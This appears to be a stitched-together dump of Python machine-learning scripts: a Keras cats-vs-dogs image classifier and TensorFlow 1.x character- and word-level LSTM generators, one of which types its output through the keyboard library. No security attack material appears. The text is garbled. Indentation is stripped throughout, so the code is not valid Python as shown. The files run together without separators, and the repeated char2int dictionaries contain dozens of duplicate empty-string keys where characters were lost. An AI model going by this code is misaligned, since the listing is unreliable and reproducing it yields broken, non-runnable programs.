x_test, y_test = [], []
for code, category in enumerate(CATEGORIES):
path = os.path.join(TESTING_DIR, category)
for img in tqdm(os.listdir(path), "Loading images:"):
# result = predict(os.path.join(path, img))
# if result == code:
# correct += 1
# total += 1
# testing_data.append((os.path.join(path, img), code))
x_test.append(prepare_image(os.path.join(path, img)))
y_test.append(code)
x_test = np.array(x_test).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
# random.shuffle(testing_data)
# total = 0
# correct = 0
# for img, code in testing_data:
# result = predict(img)
# if result == code:
# correct += 1
# total += 1
# accuracy = (correct/total) * 100
# print(f"{correct}/{total} Total Accuracy: {accuracy:.2f}%")
# print(x_test)
# print("="*50)
# print(y_test)
print(model.evaluate([x_test], y_test))
print(model.metrics_names)
import numpy as np
import matplotlib.pyplot as plt
import cv2
import os
# import cv2
from tqdm import tqdm
import random
from settings import *
# for the first time only
# for category in CATEGORIES:
# directory = os.path.join(TRAINING_DIR, category)
# os.makedirs(directory)
# # for the first time only
# for category in CATEGORIES:
# directory = os.path.join(TESTING_DIR, category)
# os.makedirs(directory)
# Total images for each category: 12501 image (total 25002)
# def create_data():
# for code, category in enumerate(CATEGORIES):
# path = os.path.join(DATADIR, category)
# for counter, img in enumerate(tqdm(os.listdir(path)), start=1):
# try:
# # absolute path of image
# image = os.path.join(path, img)
# image = cv2.imread(image, cv2.IMREAD_GRAYSCALE)
# image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
# if counter < 300:
# # testing image
# img = os.path.join(TESTING_DIR, category, img)
# else:
# # training image
# img = os.path.join(TRAINING_DIR, category, img)
# cv2.imwrite(img, image)
# except:
# pass
def load_data(path):
data = []
for code, category in enumerate(CATEGORIES):
p = os.path.join(path, category)
for img in tqdm(os.listdir(p), desc=f"Loading {category} data: "):
img = os.path.join(p, img)
img = cv2.imread(img, cv2.IMREAD_GRAYSCALE)
data.append((img, code))
return data
def load_training_data():
return load_data(TRAINING_DIR)
def load_testing_data():
return load_data(TESTING_DIR)
# # load data
# training_data = load_training_data()
# # # shuffle data
# random.shuffle(training_data)
# X, y = [], []
# for features, label in tqdm(training_data, desc="Splitting the data: "):
# X.append(features)
# y.append(label)
# X = np.array(X).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
# # pickling (images,labels)
# print("Pickling data...")
import pickle
# with open("X.pickle", 'wb') as pickle_out:
# pickle.dump(X, pickle_out)
# with open("y.pickle", 'wb') as pickle_out:
# pickle.dump(y, pickle_out)
def load():
return np.array(pickle.load(open("X.pickle", 'rb'))), pickle.load(open("y.pickle", 'rb'))
print("Loading data...")
X, y = load()
X = X/255 # to make colors from 0 to 1
print("Shape of X:", X.shape)
import tensorflow
from tensorflow.keras.datasets import cifar10
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import ModelCheckpoint
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.keras.layers import Conv2D, MaxPooling2D
# from tensorflow.keras.callbacks import TensorBoard
print("Imported tensorflow, building model...")
NAME = "Cats-vs-dogs-new-9-{val_acc:.2f}-CNN"
checkpoint = ModelCheckpoint(filepath=f"{NAME}.model", save_best_only=True, verbose=1)
# 3 conv, 64 nodes per layer, 0 dense
model = Sequential()
model.add(Conv2D(32, (2, 2), input_shape=X.shape[1:]))
model.add(Activation('relu'))
model.add(Conv2D(32, (2, 2)))
model.add(Dropout(0.1))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(64, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(96, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(96, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(128, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(128, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dense(500, activation="relu"))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.summary()
print("Compiling model ...")
# tensorboard = TensorBoard(log_dir=f"logs/{NAME}")
model.compile(loss="binary_crossentropy",
optimizer="rmsprop",
metrics=['accuracy'])
print("Training...")
model.fit(X, y, batch_size=64, epochs=30, validation_split=0.2, callbacks=[checkpoint])
### Hyper Parameters ###
batch_size = 256 # Sequences per batch
num_steps = 70 # Number of sequence steps per batch
lstm_size = 256 # Size of hidden layers in LSTMs
num_layers = 2 # Number of LSTM layers
learning_rate = 0.003 # Learning rate
keep_prob = 0.3 # Dropout keep probability
epochs = 20
# Print losses every N interations
print_every_n = 100
# Save every N iterations
save_every_n = 500
NUM_THREADS = 12
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=1,
inter_op_parallelism_threads=1,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import train_chars
import numpy as np
import keyboard
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
model = train_chars.CharRNN(len(char2int_target), lstm_size=train_chars.lstm_size, sampling=True)
saver = train_chars.tf.train.Saver()
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def write_sample(checkpoint, lstm_size, vocab_size, char2int, int2char, prime="import"):
# samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, vocab_size)
char = int2char[c]
keyboard.write(char)
time.sleep(0.01)
# samples.append(char)
while True:
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, vocab_size)
char = int2char[c]
keyboard.write(char)
time.sleep(0.01)
# samples.append(char)
# return ''.join(samples)ss", "as"
if __name__ == "__main__":
# checkpoint = train_chars.tf.train_chars.latest_checkpoint("checkpoints")
# print(checkpoint)
checkpoint = "checkpoints/i6291_l256.ckpt"
print()
f = open("generates/python.txt", "a", encoding="utf8")
int2char_target = { v:k for k, v in char2int_target.items() }
import time
time.sleep(2)
write_sample(checkpoint, train_chars.lstm_size, len(char2int_target), char2int_target, int2char_target, prime="#"*100)
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import train_chars
import numpy as np
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
model = train_chars.CharRNN(len(char2int_target), lstm_size=train_chars.lstm_size, sampling=True)
saver = train_chars.tf.train.Saver()
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, char2int, int2char, prime="The"):
samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, vocab_size)
samples.append(int2char[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, vocab_size)
char = int2char[c]
samples.append(char)
# if i == n_samples - 1 and char != " " and char != ".":
# if i == n_samples - 1 and char != " ":
# # while char != "." and char != " ":
# while char != " ":
# x[0,0] = c
# feed = {model.inputs: x,
# model.keep_prob: 1.,
# model.initial_state: new_state}
# preds, new_state = sess.run([model.prediction, model.final_state],
# feed_dict=feed)
# c = pick_top_n(preds, vocab_size)
# char = int2char[c]
# samples.append(char)
return ''.join(samples)
if __name__ == "__main__":
# checkpoint = train_chars.tf.train_chars.latest_checkpoint("checkpoints")
# print(checkpoint)
checkpoint = "checkpoints/i6291_l256.ckpt"
print()
f = open("generates/python.txt", "a", encoding="utf8")
int2char_target = { v:k for k, v in char2int_target.items() }
for prime in ["#"*100]:
samp = sample(checkpoint, 5000, train_chars.lstm_size, len(char2int_target), char2int_target, int2char_target, prime=prime)
print(samp, file=f)
print(samp)
print("="*50)
print("="*50, file=f)
import numpy as np
import train_words
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, prime=["The"]):
samples = [c for c in prime]
model = train_words.CharRNN(len(train_words.vocab), lstm_size=lstm_size, sampling=True)
saver = train_words.tf.train.Saver()
with train_words.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = train_words.vocab_to_int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_words.vocab))
samples.append(train_words.int_to_vocab[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_words.vocab))
char = train_words.int_to_vocab[c]
samples.append(char)
return ' '.join(samples)
if __name__ == "__main__":
# checkpoint = train_words.tf.train_words.latest_checkpoint("checkpoints")
# print(checkpoint)
checkpoint = f"{train_words.CHECKPOINT}/i8000_l128.ckpt"
samp = sample(checkpoint, 400, train_words.lstm_size, len(train_words.vocab), prime=["the", "very"])
print(samp)
import tensorflow as tf
import numpy as np
def get_batches(arr, batch_size, n_steps):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
for n in range(0, arr.shape[1], n_steps):
x = arr[:, n: n+n_steps]
y_temp = arr[:, n+1:n+n_steps+1]
y = np.zeros(x.shape, dtype=y_temp.dtype)
y[:, :y_temp.shape[1]] = y_temp
yield x, y
# batches = get_batches(encoded, 10, 50)
# x, y = next(batches)
def build_inputs(batch_size, num_steps):
''' Define placeholders for inputs, targets, and dropout
Arguments
---------
batch_size: Batch size, number of sequences per batch
num_steps: Number of sequence steps in a batch
'''
# Declare placeholders we'll feed into the graph
inputs = tf.placeholder(tf.int32, shape=(batch_size, num_steps), name="inputs")
targets = tf.placeholder(tf.int32, shape=(batch_size, num_steps), name="targets")
# Keep probability placeholder for drop out layers
keep_prob = tf.placeholder(tf.float32, name="keep_prob")
return inputs, targets, keep_prob
def build_lstm(lstm_size, num_layers, batch_size, keep_prob):
''' Build LSTM cell.
Arguments
---------
lstm_size: Size of the hidden layers in the LSTM cells
num_layers: Number of LSTM layers
batch_size: Batch size
keep_prob: Scalar tensor (tf.placeholder) for the dropout keep probability
'''
### Build the LSTM Cell
def build_cell():
# Use a basic LSTM cell
lstm = tf.contrib.rnn.BasicLSTMCell(lstm_size)
# Add dropout to the cell outputs
drop_lstm = tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
return drop_lstm
# Stack up multiple LSTM layers, for deep learning
# build num_layers layers of lstm_size LSTM Cells
cell = tf.contrib.rnn.MultiRNNCell([build_cell() for _ in range(num_layers)])
initial_state = cell.zero_state(batch_size, tf.float32)
return cell, initial_state
def build_output(lstm_output, in_size, out_size):
''' Build a softmax layer, return the softmax output and logits.
Arguments
---------
lstm_output: List of output tensors from the LSTM layer
in_size: Size of the input tensor, for example, size of the LSTM cells
out_size: Size of this softmax layer
'''
# Reshape output so it's a bunch of rows, one row for each step for each sequence.
# Concatenate lstm_output over axis 1 (the columns)
seq_output = tf.concat(lstm_output, axis=1)
# Reshape seq_output to a 2D tensor with lstm_size columns
x = tf.reshape(seq_output, (-1, in_size))
# Connect the RNN outputs to a softmax layer
with tf.variable_scope('softmax'):
# Create the weight and bias variables here
softmax_w = tf.Variable(tf.truncated_normal((in_size, out_size), stddev=0.1))
softmax_b = tf.Variable(tf.zeros(out_size))
# Since output is a bunch of rows of RNN cell outputs, logits will be a bunch
# of rows of logit outputs, one for each step and sequence
logits = tf.matmul(x, softmax_w) + softmax_b
# Use softmax to get the probabilities for predicted characters
out = tf.nn.softmax(logits, name="predictions")
return out, logits
def build_loss(logits, targets, num_classes):
''' Calculate the loss from the logits and the targets.
Arguments
---------
logits: Logits from final fully connected layer
targets: Targets for supervised learning
num_classes: Number of classes in targets
'''
# One-hot encode targets and reshape to match logits, one row per sequence per step
y_one_hot = tf.one_hot(targets, num_classes)
y_reshaped = tf.reshape(y_one_hot, logits.get_shape())
# Softmax cross entropy loss
loss = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=y_reshaped)
loss = tf.reduce_mean(loss)
return loss
def build_optimizer(loss, learning_rate, grad_clip):
''' Build optmizer for training, using gradient clipping.
Arguments:
loss: Network loss
learning_rate: Learning rate for optimizer
grad_clip: threshold for preventing gradient exploding
'''
# Optimizer for training, using gradient clipping to control exploding gradients
tvars = tf.trainable_variables()
grads, _ = tf.clip_by_global_norm(tf.gradients(loss, tvars), grad_clip)
train_op = tf.train.AdamOptimizer(learning_rate)
optimizer = train_op.apply_gradients(zip(grads, tvars))
return optimizer
class CharRNN:
def __init__(self, num_classes, batch_size=64, num_steps=50,
lstm_size=128, num_layers=2, learning_rate=0.001,
grad_clip=5, sampling=False):
# When we're using this network for sampling later, we'll be passing in
# one character at a time, so providing an option for that
if sampling:
batch_size, num_steps = 1, 1
else:
batch_size, num_steps = batch_size, num_steps
tf.reset_default_graph()
# Build the input placeholder tensors
self.inputs, self.targets, self.keep_prob = build_inputs(batch_size, num_steps)
# Build the LSTM cell
# (lstm_size, num_layers, batch_size, keep_prob)
cell, self.initial_state = build_lstm(lstm_size, num_layers, batch_size, self.keep_prob)
### Run the data through the RNN layers
# First, one-hot encode the input tokens
x_one_hot = tf.one_hot(self.inputs, num_classes)
# Run each sequence step through the RNN with tf.nn.dynamic_rnn
outputs, state = tf.nn.dynamic_rnn(cell, x_one_hot, initial_state=self.initial_state)
self.final_state = state
# Get softmax predictions and logits
# (lstm_output, in_size, out_size)
# There are lstm_size nodes in hidden layers, and the number
# of the total characters as num_classes (i.e output layer)
self.prediction, self.logits = build_output(outputs, lstm_size, num_classes)
# Loss and optimizer (with gradient clipping)
# (logits, targets, lstm_size, num_classes)
self.loss = build_loss(self.logits, self.targets, num_classes)
# (loss, learning_rate, grad_clip)
self.optimizer = build_optimizer(self.loss, learning_rate, grad_clip)
from time import perf_counter
from collections import namedtuple
from parameters import *
from train import *
from utils import get_time, get_text
import tqdm
import numpy as np
import os
import string
import tensorflow as tf
if __name__ == "__main__":
CHECKPOINT = "checkpoints"
if not os.path.isdir(CHECKPOINT):
os.mkdir(CHECKPOINT)
vocab, int2char, char2int, text = get_text(char_level=True,
files=["E:\\datasets\\python_code_small.py", "E:\\datasets\\my_python_code.py"],
load=False,
lower=False,
save_index=4)
print(char2int)
encoded = np.array([char2int[c] for c in text])
print("[*] Total characters :", len(text))
print("[*] Number of classes :", len(vocab))
model = CharRNN(num_classes=len(vocab), batch_size=batch_size, num_steps=num_steps,
lstm_size=lstm_size, num_layers=num_layers,
learning_rate=learning_rate)
saver = tf.train.Saver(max_to_keep=100)
with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=NUM_THREADS)) as sess:
sess.run(tf.global_variables_initializer())
# Use the line below to load a checkpoint and resume training
saver.restore(sess, f'{CHECKPOINT}/e13_l256.ckpt')
total_steps = len(encoded) // batch_size // num_steps
for e in range(14, epochs):
# Train network
cs = 0
new_state = sess.run(model.initial_state)
min_loss = np.inf
batches = tqdm.tqdm(get_batches(encoded, batch_size, num_steps),
f"Epoch= {e+1}/{epochs} - {cs}/{total_steps}",
total=total_steps)
for x, y in batches:
cs += 1
start = perf_counter()
feed = {model.inputs: x,
model.targets: y,
model.keep_prob: keep_prob,
model.initial_state: new_state}
batch_loss, new_state, _ = sess.run([model.loss,
model.final_state,
model.optimizer],
feed_dict=feed)
batches.set_description(f"Epoch: {e+1}/{epochs} - {cs}/{total_steps} loss:{batch_loss:.2f}")
saver.save(sess, f"{CHECKPOINT}/e{e}_l{lstm_size}.ckpt")
print("Loss:", batch_loss)
saver.save(sess, f"{CHECKPOINT}/i{cs}_l{lstm_size}.ckpt")
from time import perf_counter
from collections import namedtuple
from colorama import Fore, init
# local
from parameters import *
from train import *
from utils import get_time, get_text
init()
GREEN = Fore.GREEN
RESET = Fore.RESET
import numpy as np
import os
import tensorflow as tf
import string
CHECKPOINT = "checkpoints_words"
files = ["carroll-alice.txt", "text.txt", "text8.txt"]
if not os.path.isdir(CHECKPOINT):
os.mkdir(CHECKPOINT)
vocab, int2word, word2int, text = get_text("data", files=files)
encoded = np.array([word2int[w] for w in text])
del text
if __name__ == "__main__":
def calculate_time():
global time_took
global start
global total_time_took
global times_took
global avg_time_took
global time_estimated
global total_steps
time_took = perf_counter() - start
total_time_took += time_took
times_took.append(time_took)
avg_time_took = sum(times_took) / len(times_took)
time_estimated = total_steps * avg_time_took - total_time_took
model = CharRNN(num_classes=len(vocab), batch_size=batch_size, num_steps=num_steps,
lstm_size=lstm_size, num_layers=num_layers,
learning_rate=learning_rate)
saver = tf.train.Saver(max_to_keep=100)
with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=NUM_THREADS)) as sess:
sess.run(tf.global_variables_initializer())
# Use the line below to load a checkpoint and resume training
# saver.restore(sess, f'{CHECKPOINT}/i3524_l128_loss=1.36.ckpt')
# calculate total steps
total_steps = epochs * len(encoded) / (batch_size * num_steps)
time_estimated = "N/A"
times_took = []
total_time_took = 0
current_steps = 0
progress_percentage = 0
for e in range(epochs):
# Train network
new_state = sess.run(model.initial_state)
min_loss = np.inf
for x, y in get_batches(encoded, batch_size, num_steps):
current_steps += 1
start = perf_counter()
feed = {model.inputs: x,
model.targets: y,
model.keep_prob: keep_prob,
model.initial_state: new_state}
batch_loss, new_state, _ = sess.run([model.loss,
model.final_state,
model.optimizer],
feed_dict=feed)
progress_percentage = current_steps * 100 / total_steps
if batch_loss < min_loss:
# saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}_loss={batch_loss:.2f}.ckpt")
min_loss = batch_loss
calculate_time()
print(f'{GREEN}[{progress_percentage:.2f}%] Epoch: {e+1:3}/{epochs} Training loss: {batch_loss:2.4f} - {time_took:2.4f} s/batch - ETA: {get_time(time_estimated)}{RESET}')
continue
if (current_steps % print_every_n == 0):
calculate_time()
print(f'[{progress_percentage:.2f}%] Epoch: {e+1:3}/{epochs} Training loss: {batch_loss:2.4f} - {time_took:2.4f} s/batch - ETA: {get_time(time_estimated)}', end='\r')
if (current_steps % save_every_n == 0):
saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}.ckpt")
saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}.ckpt")
import tqdm
import os
import inflect
import glob
import pickle
import sys
from string import punctuation, whitespace
p = inflect.engine()
UNK = "<unk>"
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
def get_time(seconds, form="{hours:02}:{minutes:02}:{seconds:02}"):
try:
seconds = int(seconds)
except:
return seconds
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
months, days = divmod(days, 30)
years, months = divmod(months, 12)
if days:
form = "{days}d " + form
if months:
form = "{months}m " + form
elif years:
form = "{years}y " + form
return form.format(**locals())
def get_text(path="data",
files=["carroll-alice.txt", "text.txt", "text8.txt"],
load=True,
char_level=False,
lower=True,
save=True,
save_index=1):
if load:
# check if any pre-cleaned saved data exists first
pickle_files = glob.glob(os.path.join(path, "text_data*.pickle"))
if len(pickle_files) == 1:
return pickle.load(open(pickle_files[0], "rb"))
elif len(pickle_files) > 1:
sizes = [ get_size(os.path.getsize(p)) for p in pickle_files ]
s = ""
for i, (file, size) in enumerate(zip(pickle_files, sizes), start=1):
s += str(i) + " - " + os.path.basename(file) + f" ({size}) \n"
choice = int(input(f"""Multiple data corpus found:
{s}
99 - use and clean .txt files
Please choose one: """))
if choice != 99:
chosen_file = pickle_files[choice-1]
print("[*] Loading pickled data...")
return pickle.load(open(chosen_file, "rb"))
text = ""
for file in tqdm.tqdm(files, "Loading data"):
file = os.path.join(path, file)
with open(file) as f:
if lower:
text += f.read().lower()
else:
text += f.read()
print(len(text))
punc = set(punctuation)
# text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c not in punc ])
text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c in char2int_target ])
# for ws in whitespace:
# text = text.replace(ws, " ")
if char_level:
text = list(text)
else:
text = text.split()
# new_text = []
new_text = text
# append = new_text.append
# co = 0
# if char_level:
# k = 0
# for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
# if not text[i].isdigit():
# append(text[i])
# k = 0
# else:
# # if this digit is mapped to a word already using
# # the below method, then just continue
# if k >= 1:
# k -= 1
# continue
# # if there are more digits following this character
# # k = 0
# digits = ""
# while text[i+k].isdigit():
# digits += text[i+k]
# k += 1
# w = p.number_to_words(digits).replace("-", " ").replace(",", "")
# for c in w:
# append(c)
# co += 1
# else:
# for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
# # convert digits to words
# # (i.e '7' to 'seven')
# if text[i].isdigit():
# text[i] = p.number_to_words(text[i]).replace("-", " ")
# append(text[i])
# co += 1
# else:
# append(text[i])
vocab = sorted(set(new_text))
print(f"alices in vocab:", "alices" in vocab)
# print(f"Converted {co} digits to words.")
print(f"Total vocabulary size:", len(vocab))
int2word = { i:w for i, w in enumerate(vocab) }
word2int = { w:i for i, w in enumerate(vocab) }
if save:
pickle_filename = os.path.join(path, f"text_data_{save_index}.pickle")
